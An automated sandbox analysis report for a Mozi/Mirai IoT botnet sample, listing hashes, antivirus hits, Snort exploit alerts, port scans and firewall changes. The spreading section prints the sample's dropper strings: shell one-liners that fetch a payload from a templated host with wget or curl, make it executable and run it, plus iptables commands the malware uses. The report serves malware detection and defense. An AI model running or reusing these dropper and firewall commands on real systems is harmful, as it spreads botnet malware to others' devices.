Analysis Report mozi.a.zip

Overview

General Information

Sample Name: mozi.a.zip
Analysis ID: 349551
MD5: eec5c6c219535fba3a0492ea8118b397
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: mozi.a.zip Avira: detected
Antivirus detection for dropped file
Source: /usr/networks Avira: detection malicious, Label: LINUX/Mirai.lldau
Multi AV Scanner detection for submitted file
Source: mozi.a.zip Virustotal: Detection: 65% Perma Link
Source: mozi.a.zip Metadefender: Detection: 51% Perma Link
Source: mozi.a.zip ReversingLabs: Detection: 67%

Spreading:

barindex
Found strings indicative of a multi-platform dropper
Source: mozi.a.zip String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: mozi.a.zip String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: mozi.a.zip String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/mozi.a.zip (PID: 4621) Opens: /proc/net/route Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4621) Opens: /proc/net/route Jump to behavior

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.114.71.142: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 80.169.237.142: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.229.187.191: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38870 -> 151.139.241.251:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38870 -> 151.139.241.251:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.162.120.168: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.20.247.252: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.199.18.39: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 194.81.6.182: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.175.197: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.89.22.107: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 12.91.239.157: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 166.127.254.2: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 81.171.22.94: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.141.42.51: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 36.89.55.95:6881 -> 192.168.2.20:8987
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 88.86.98.50: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:48066 -> 175.203.81.2:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:48066 -> 175.203.81.2:80
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.171.18:48131 -> 192.168.2.20:8987
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:42806 -> 144.76.43.37:80
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:35088 -> 23.254.64.88:80
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.97.168.156:5353 -> 192.168.2.20:8987
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 158.39.1.58: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.165.238.97: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:46030 -> 203.46.145.77:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:46030 -> 203.46.145.77:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.185.94.208: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.224.238.149: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:49398 -> 23.217.12.208:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:49398 -> 23.217.12.208:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.217.12.208:80 -> 192.168.2.20:49398
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:51358 -> 172.67.201.119:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:51358 -> 172.67.201.119:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:32828 -> 47.246.22.230:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60698 -> 159.140.205.214:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:32828 -> 47.246.22.230:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.159.88.60: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.101.189.42: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.193.139.218: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 66.169.97.135: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60198 -> 24.239.192.38:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:58988 -> 13.89.231.175:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:60198 -> 24.239.192.38:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:58988 -> 13.89.231.175:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:36372 -> 113.161.185.44:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:57414 -> 41.57.99.92:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:57414 -> 41.57.99.92:80
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.20:56274 -> 176.116.205.200:52869
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.167.162.206: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.85.22.47: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:48524 -> 193.248.153.76:80
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.70.255:1900 -> 192.168.2.20:8987
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:55086 -> 74.79.213.38:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:55086 -> 74.79.213.38:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.216.193.84: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.7.204.55: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40316 -> 156.225.150.183:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40316 -> 156.225.150.183:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.45.252.1: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:32776 -> 23.236.242.26:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:32776 -> 23.236.242.26:80
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.96.39.49:1027 -> 192.168.2.20:8987
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.96.55.112: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 193.50.198.5: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:54454 -> 23.12.191.118:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:54454 -> 23.12.191.118:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.12.191.118:80 -> 192.168.2.20:54454
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.255.14.222: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 131.100.27.86: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:59832 -> 23.53.160.36:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:59832 -> 23.53.160.36:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.53.160.36:80 -> 192.168.2.20:59832
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.7.89.221: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 149.28.33.22: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 213.222.29.194: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.221.222.106: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 116.68.99.187:63032 -> 192.168.2.20:8987
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 5.106.1.251:3317 -> 192.168.2.20:8987
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.149.61.90: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 63.148.112.178: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 212.149.148.17: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:39748 -> 2.22.143.222:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:39748 -> 2.22.143.222:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 2.22.143.222:80 -> 192.168.2.20:39748
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.241.192.161: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:33236 -> 180.254.107.55:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:33236 -> 180.254.107.55:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:55722 -> 34.66.226.190:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:49434 -> 104.149.254.177:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:49434 -> 104.149.254.177:80
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 80.255.15.98: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.27.146.71: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:53268 -> 104.103.19.232:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:53268 -> 104.103.19.232:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.103.19.232:80 -> 192.168.2.20:53268
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:45072 -> 77.238.74.163:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:45072 -> 77.238.74.163:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:37542 -> 176.119.128.106:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:37542 -> 176.119.128.106:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.155.20.45: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.27.214.206: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.141.215.230: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.236.144.108: -> 192.168.2.20:
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 81.36.208.25 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 57.228.46.214 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 8.144.29.157 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 137.96.65.50 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 57.57.176.173 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 133.239.82.116 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 64.90.35.78 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 119.218.221.67 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 188.48.235.83 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 122.136.129.218 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 161.39.154.190 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 151.67.70.41 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 24.10.221.243 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 156.188.202.182 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 179.46.171.6 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 29.23.135.71 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 87.100.168.25 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 190.114.242.248 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 125.232.30.122 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 114.19.106.118 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 81.197.119.173 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 103.227.10.51 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 87.221.52.97 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 17.36.10.53 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 157.56.20.190 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 59.47.52.108 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 24.32.163.88 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 152.217.15.203 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 59.147.111.47 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 90.21.129.140 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 84.116.205.234 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 120.248.5.159 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 151.235.98.188 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 194.182.145.31 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 36.220.148.252 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 37.31.202.128 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 134.182.231.67 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 31.27.78.45 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 92.187.181.216 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 72.90.138.133 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 50.126.123.128 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 45.109.162.162 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 182.122.123.189 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 7.242.90.54 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 83.10.2.12 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 179.151.12.46 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 47.154.113.173 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 206.150.7.5 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 193.98.148.181 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 108.181.239.177 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 152.58.166.168 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 137.110.66.54 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 207.23.54.245 ports 2,5,6,8,9,52869
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 4638) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4670) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4674) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4718) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4737) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4747) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4772) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4793) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4813) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4816) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4825) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4847) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4895) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4918) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4945) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4966) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4985) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5004) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5022) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5042) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5060) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5079) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5097) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5118) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5219) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5222) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5226) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5242) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5265) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5288) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5314) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5338) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 56274 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 56274
Source: unknown Network traffic detected: HTTP traffic on port 45556 -> 49152
Source: unknown Network traffic detected: HTTP traffic on port 49152 -> 45556
Source: unknown Network traffic detected: HTTP traffic on port 39288 -> 49152
Source: unknown Network traffic detected: HTTP traffic on port 49152 -> 39288
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.20:39886 -> 45.109.162.162:49152
Source: global traffic TCP traffic: 192.168.2.20:46710 -> 69.11.36.124:5555
Source: global traffic TCP traffic: 192.168.2.20:37588 -> 75.91.130.63:8080
Source: global traffic TCP traffic: 192.168.2.20:46004 -> 195.153.28.200:8080
Source: global traffic TCP traffic: 192.168.2.20:56840 -> 23.5.140.124:81
Source: global traffic TCP traffic: 192.168.2.20:45716 -> 156.72.38.195:5555
Source: global traffic TCP traffic: 192.168.2.20:43108 -> 195.115.84.245:8080
Source: global traffic TCP traffic: 192.168.2.20:39264 -> 144.165.39.167:8080
Source: global traffic TCP traffic: 192.168.2.20:54508 -> 209.72.224.1:7574
Source: global traffic TCP traffic: 192.168.2.20:40212 -> 215.164.157.85:8080
Source: global traffic TCP traffic: 192.168.2.20:36032 -> 148.150.251.31:8443
Source: global traffic TCP traffic: 192.168.2.20:51812 -> 84.116.205.234:37215
Source: global traffic TCP traffic: 192.168.2.20:37502 -> 47.62.131.40:81
Source: global traffic TCP traffic: 192.168.2.20:36014 -> 35.9.95.44:7574
Source: global traffic TCP traffic: 192.168.2.20:47396 -> 78.138.19.157:8080
Source: global traffic TCP traffic: 192.168.2.20:47554 -> 211.98.218.197:8080
Source: global traffic TCP traffic: 192.168.2.20:58296 -> 126.165.20.233:81
Source: global traffic TCP traffic: 192.168.2.20:48618 -> 4.121.119.146:5555
Source: global traffic TCP traffic: 192.168.2.20:33418 -> 7.242.90.54:37215
Source: global traffic TCP traffic: 192.168.2.20:50076 -> 203.113.226.208:7574
